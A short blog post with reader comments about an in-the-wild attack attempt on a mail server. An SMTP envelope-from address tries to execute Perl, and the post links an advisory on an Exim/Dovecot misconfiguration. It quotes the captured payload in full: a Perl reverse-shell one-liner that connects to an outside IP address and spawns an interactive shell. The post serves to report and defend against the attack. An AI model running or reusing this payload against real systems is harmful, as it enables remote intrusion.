SMTP: envelope-from address tries to execute perl
earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e ‘use Socket;$i=“178.218.211.118”;$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
not sure which MTA is vulnerable, yet.
…in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
Comments:
Any news on this? I received three of these yester…
Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.
I searched on Google but I only found this blog entry.
RedTeam Pentesting GmbH has a detailed evaluation …
iiegn -
RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here